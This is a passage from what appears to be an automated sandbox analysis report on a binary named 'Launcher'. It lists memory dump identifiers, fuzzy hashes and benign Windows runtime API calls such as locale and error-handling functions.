                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 2701053895-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 9166b18160a495caca5eacd8e9f1d940bf64ca2e3d9ce0ec39cff90f60d578f7
                                                                                                                                                                                                                                                            • Instruction ID: 2d23693004295cb3891f8ed769287ce74367026dfcfabbf5cb01a221083bf4cc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9166b18160a495caca5eacd8e9f1d940bf64ca2e3d9ce0ec39cff90f60d578f7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8551AA75900298AFDF12AF2A8C85AFE77BDDFA5394F14419DF41893251EA309D419B20
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: GetLastError.KERNEL32(00000000,?,009E2A49), ref: 009E0717
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: SetLastError.KERNEL32(00000000,?,?,00000028,009DD2C9), ref: 009E07B9
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009E5C60
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 3736152602-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 568a3f1f65d9baacb4b26ac1cbebeb6702ca8cedd48c5d6eb5e91de7f920f33c
                                                                                                                                                                                                                                                            • Instruction ID: ba0f706e75eba8fde99a132dcfd10c981e8549658bfde603a0e42b8ae2b4a7bc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 568a3f1f65d9baacb4b26ac1cbebeb6702ca8cedd48c5d6eb5e91de7f920f33c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD21B372615746ABDB299B2ADD51B7A73ACEF84318B21007EFD01D6241EB74AD40CB50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: GetLastError.KERNEL32(00000000,?,009E2A49), ref: 009E0717
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: SetLastError.KERNEL32(00000000,?,?,00000028,009DD2C9), ref: 009E07B9
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009E5D80
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 3736152602-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 89db53752acd7f7e38244da65bdf70958e5be7dd92126da1cd00b5faa2d730b9
                                                                                                                                                                                                                                                            • Instruction ID: b8e456f995f984817af67650813d59e778c499b4cd5bb650cdbbba68e285ad55
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89db53752acd7f7e38244da65bdf70958e5be7dd92126da1cd00b5faa2d730b9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4611E972611646ABD725AF25DC46BBA73ECEF84314B11007AF901DB281EB74ED44D750
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009DD047: EnterCriticalSection.KERNEL32(?,?,009DA841,00000000,009FB3D8,0000000C,009DA7FA,00001000,?,009E17CA,00001000,?,009E08B1,00000001,00000364,?), ref: 009DD056
                                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(009E169A,00000001,009FB7F0,0000000C,009E10A8,-00000050), ref: 009E16DF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 1272433827-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 57479a077d5879e7add77f6947432f8bc4c9d45c51317e38654d89137e3a8353
                                                                                                                                                                                                                                                            • Instruction ID: 126d190b5b3d2fee4f74f71033c812de2ba7777feac96f0713d5d5b026974dd7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57479a077d5879e7add77f6947432f8bc4c9d45c51317e38654d89137e3a8353
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF0497AA58204EFD711EF99E802BAD77F0EB84725F10812AF410DB3A1DB759900DF50
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: 0$A2sx
                                                                                                                                                                                                                                                            • API String ID: 0-3748852311
                                                                                                                                                                                                                                                            • Opcode ID: 3e3472928bc7604d4ed8187864e2e54548b64ffb3d0adf49ac6012a3a887ccd6
                                                                                                                                                                                                                                                            • Instruction ID: 2ef817312c8aae8bcbe7fe6ece30178ecac7c7727bb13fda26a9e093d58d01cb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e3472928bc7604d4ed8187864e2e54548b64ffb3d0adf49ac6012a3a887ccd6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66C1E0309806068FCB24EF78C5846BABBFAEF45314F14CA1BE49A97791C335AD45CB60
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: 0$A2sx
                                                                                                                                                                                                                                                            • API String ID: 0-3748852311
                                                                                                                                                                                                                                                            • Opcode ID: 64301e8b267f36ed85ee53bdeda9b57e9918cf3417d5e8584ccda62c4ab07f12
                                                                                                                                                                                                                                                            • Instruction ID: 95cdbb2e452407e35d4a97f100c47c67463491508c2e841298dc5382948a31f2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64301e8b267f36ed85ee53bdeda9b57e9918cf3417d5e8584ccda62c4ab07f12
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAB1E43098060A8BCB24DF68C9556BFB7B9AF44300F54CA1BD5A2E7793CF34AA01DB51
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009E9BCE,?,?,00000008,?,?,009F005B,00000000), ref: 009E9EA0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                                                                                            • Opcode ID: 937f0aff0dd7ded886c53e355c696b0624204273c1c23e466fe7aef5879ff41d
                                                                                                                                                                                                                                                            • Instruction ID: e4580cad159664c5e946940c1f4e35df9225a01932c0db834a4eb5a25030de96
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 937f0aff0dd7ded886c53e355c696b0624204273c1c23e466fe7aef5879ff41d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01B12A31110648DFD716CF29C48ABA57BE0FF45364F298698E99ACF2A2C335ED91CB40
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009D3CF5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                                                                                            • Opcode ID: 9f87d0a7909d768d4dc7553ab3628775499a5011f22631cd09106a84b6a2b759
                                                                                                                                                                                                                                                            • Instruction ID: 71655c53debfedb3334fcb6e3fb98eeab00397035843455a5d5c59ccb8c7fffb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f87d0a7909d768d4dc7553ab3628775499a5011f22631cd09106a84b6a2b759
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89A16AF29266058BDB18CF69D9816A9BBF6FB48315F14C62AD421EB3A0D334A940DF50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: GetLastError.KERNEL32(00000000,?,009E2A49), ref: 009E0717
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: SetLastError.KERNEL32(00000000,?,?,00000028,009DD2C9), ref: 009E07B9
                                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(009E595A,00000001,00000000,?,-00000050,?,009E574A,00000000,-00000002,00000000,?,00000055,?), ref: 009E5931
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                                                            • Opcode ID: 8304e9665e45d263ff99aff2003fc8263afe6a3895deeae10b960641b4e4ef4d
                                                                                                                                                                                                                                                            • Instruction ID: b3b1c58d16061834f3282242d83e546390e62dcb611c6140594ed800731bf00e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8304e9665e45d263ff99aff2003fc8263afe6a3895deeae10b960641b4e4ef4d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8111293B2047059FDB189F3AC8A16BAB795FFC432DB15442DE98647641D371BC42CB40
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: GetLastError.KERNEL32(00000000,?,009E2A49), ref: 009E0717
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: SetLastError.KERNEL32(00000000,?,?,00000028,009DD2C9), ref: 009E07B9
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,009E5B76,00000000,00000000,?), ref: 009E5F05
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                                                                                            • Opcode ID: 92ad93d4d8ea148bd53b93354e1071cb49d4bd3cad04999b3d8fde1b493fc959
                                                                                                                                                                                                                                                            • Instruction ID: 116630fb7598ce5f826d2d12e754b64a8329069cdd88b2c23ebc1edd2c9b2c16
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92ad93d4d8ea148bd53b93354e1071cb49d4bd3cad04999b3d8fde1b493fc959
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7501F936A04552BBDB295B278C05BBA3759DF80758F164C68EC46A31C0EA74FE41C690
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: GetLastError.KERNEL32(00000000,?,009E2A49), ref: 009E0717
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: SetLastError.KERNEL32(00000000,?,?,00000028,009DD2C9), ref: 009E07B9
                                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(009E5C0C,00000001,?,?,-00000050,?,009E5712,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 009E5BF7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                                                            • Opcode ID: 8e52aecf143a097a31eefcbf0208168e2d83482925c9e1eff574424318cfe812
                                                                                                                                                                                                                                                            • Instruction ID: 70ad834f9237dc40bbf0bcda67507e54e00e3d21c09551ea9af7e32d0e6ee372
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e52aecf143a097a31eefcbf0208168e2d83482925c9e1eff574424318cfe812
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25F046363047485FCB255F3ACC91B7ABB94EFC032CB1A842DF9458B680C6B1AC41CA00
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: GetLastError.KERNEL32(00000000,?,009E2A49), ref: 009E0717
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: SetLastError.KERNEL32(00000000,?,?,00000028,009DD2C9), ref: 009E07B9
                                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(009E5D2C,00000001,?,?,?,009E576C,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 009E5D18
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                                                            • Opcode ID: 358ce555a85ebc4fd779eda0cc469098b5d77a3f20d9ba1d1b1c236ef49b5b13
                                                                                                                                                                                                                                                            • Instruction ID: c828b345b9fcdbbab3c8eb491a4eb8a098521c2141740dde49d4867d70538212
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 358ce555a85ebc4fd779eda0cc469098b5d77a3f20d9ba1d1b1c236ef49b5b13
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34F0E53A30024957CB159F36DC5976ABF94EFC2718B174059FE098B290C6B19C82CB90
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,009DBDA3,?,20001004,00000000,00000002,?,?,009DACB5), ref: 009E11E0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
